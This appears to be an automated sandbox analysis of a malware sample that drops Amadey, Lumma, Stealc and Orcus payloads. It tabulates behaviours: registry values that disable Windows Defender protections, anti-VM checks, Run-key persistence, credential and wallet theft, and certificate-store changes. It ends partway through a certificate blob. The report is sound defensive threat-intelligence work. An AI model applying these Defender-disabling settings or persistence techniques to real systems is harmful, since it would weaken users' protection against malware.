Analysis Overview
SHA256
39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a
Threat Level: Known bad
The file 39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe was found to be: Known bad.
Malicious Activity Summary
Orcus family
Orcus
Lumma family
Amadey
Suspicious use of NtCreateUserProcessOtherParentProcess
Stealc family
Stealc
Lumma Stealer, LummaC
GCleaner
Amadey family
Modifies Windows Defender Real-time Protection settings
Gcleaner family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Orcurs Rat Executable
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Identifies Wine through registry keys
Executes dropped EXE
Checks BIOS information in registry
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Windows security modification
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Drops file in Windows directory
Enumerates physical storage devices
Browser Information Discovery
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Modifies registry class
Kills process with taskkill
Runs net.exe
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Checks processor information in registry
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-06 02:25
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-06 02:25
Reported
2024-12-06 02:28
Platform
win7-20240903-en
Max time kernel
146s
Max time network
149s
Command Line
Signatures
Amadey
Amadey family
GCleaner
Gcleaner family
Lumma Stealer, LummaC
Lumma family
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
Orcus
Orcus family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1816 created 1216 | N/A | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | C:\Windows\Explorer.EXE |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Orcurs Rat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\be61ddc95d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\be61ddc95d.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\00c0967b44.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\00c0967b44.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\26623c4c44.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\26623c4c44.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\SmartScreen = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smartscreen.exe" | C:\Users\Admin\AppData\Local\Temp\smartscreen.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\6f3509a2c1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\6f3509a2c1.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| File opened for modification | C:\Windows\MovieArchives | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| File opened for modification | C:\Windows\PackageExpression | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\1012582001\00c0967b44.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\491505\Dr.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012580001\6f3509a2c1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\1012582001\00c0967b44.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012579001\015311d53f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Documents\EHJDGCBGDB.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VTC9F.tmp\i1A5m12.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012583001\26623c4c44.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012582001\00c0967b44.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012581001\be61ddc95d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\39c70553879c5b9162ac95578f271a2f1a5cb13b21cb32a153e7fcd83d37f50a.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420